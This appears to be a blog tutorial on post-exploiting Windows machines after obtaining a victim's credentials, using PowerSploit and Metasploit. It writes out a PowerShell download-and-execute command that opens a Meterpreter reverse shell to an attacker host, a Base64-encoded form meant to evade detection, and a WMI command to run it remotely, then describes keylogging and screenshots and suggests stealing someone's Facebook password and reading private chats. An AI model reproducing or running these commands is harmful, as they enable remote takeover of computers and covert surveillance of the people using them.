i Penetration Test – Exploit the network of a victim ( Part 2 ) – All things in moderation

Penetration Test – Exploit the network of a victim ( Part 2 )

In the previous post, I think you guys could have a victim’s credential on their network. Now, it is time to do what we want, I mean post exploitation. First, I will focus on Windows systems, because it’s so popular nowadays, right? 😀

Actually, Microsoft guys help us a lot, because we are going to use PowerShell or WMI to exploit the system. PowerSploit is a PowerShell framework of modules that is created by Matt Graeber. You can get it here, they also add Visual Studio project file for us. I don’t want to tell you how poweful PowerShell is, you should try and feel it by yourself. And you shouldn’t forget, if we have have a valid local administrative credentials and on the target’s network. We could use PowerShell to force a user to download and invoke a PowerShell script and gain reverse shell. So what is the code that we are going to run on a victim ? That is here.

  • Image Invoke-Shellcode.ps1

pentest web powersploit

This Invoke-Shellcode.ps1 file is going to inject malicious code into notepad.exe file ( for example ), and then connect back to our host.
But we should turn on our listener first by run a script called StartListener.py.

  • Image StartListener.py
    pentest web powersploit

This script will also migrate with the process when a victim host connects back to our host. But first, we need to run Invoke-Shellcode.ps1 on this victim’s computer remotely. Our code is here:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.120 -Lport 443 -Force

The IEX command will tell PowerShell download Invoke-Shellcode.ps1 from GitHub and connect back to our host at address: 192.168.10.103 over port 443. Secondly, keep in minds, some connections can be track on the victim’s computer, so we need to encode our command to avoid it. We could use Base64 encode to do this. Because the input of this file is a text file, so we need to put it in a file and then encode it.

  • Image create ps_encoder.py input file.

pentest web powersploit

And our command above becomes:

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAwADMAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=

Then we use Powershell to run this script remotely.

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAwADMAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=" -ComputerName WIN-BK58LSTG3KP -Credential Stephen

pentest web powersploit

If your credential has been successfully completed, you can do whatever script on the victim host. For example: keylogging, dump memory from a process, take a screen shot, get SSIDs and passwords of their wifi connections,…

When our command successed, we could see the connect back to our listener from a victim:

pentest web powersploit

Then we use Metasploit to run a few dirty commands:

  • Find out what Metasploit could help us:

pentest web powersploit

  • Get information of their system:

pentest web powersploit

  • Turn on keylogging to find out what are we type:

pentest web powersploit

  • And some screenshots for fun:

pentest web powersploit

Here is our victim’s screenshots:

pentest web powersploit

With this feature, you guys could take their Facebook ID, passwords and find out what he is chatting with your girlfriend by keylogging so easily, right ?

Some tips:

First, you need to know ComputerName of the remote computer

pentest web powersploit

For this thing works, we need to run some commands in the remote computer and local computer
– On both computers:
Firstly, Check if Windows Remote Management Service is running:

pentest web powersploit

If it is not running, we go to services.msc and turn it on.

pentest web powersploit

Additionally, we need to set this service starts automatically in the remote victim.

Secondly, we need to run this command in both computers.

pentest web powersploit

And then your PowerShell is not going to ask any lame question like that:

pentest web powersploit

Thirdly, you guys need to configure Windows PowerShell for remoting, type the following command:

pentest web powersploit

  • On Your Attacker’s computer, you need to run this command:

pentest web powersploit

Because if the remote computer is not in a trusted domain, the remote computer might not be able to authenticate your credentials. To enable authentication, you need to add the remote computer to the list of trusted hosts for the local computer in WinRM. To do so, type:

pentest web powersploit

With my tips, I think your environment could do all our stuffs without any errors.

Now, you guys should practise with this Powershell and find out how it works. I think you guys will meet some little issues when working with this tool, so please inform me when you have it. I always here for help. 🙂

Leave a Reply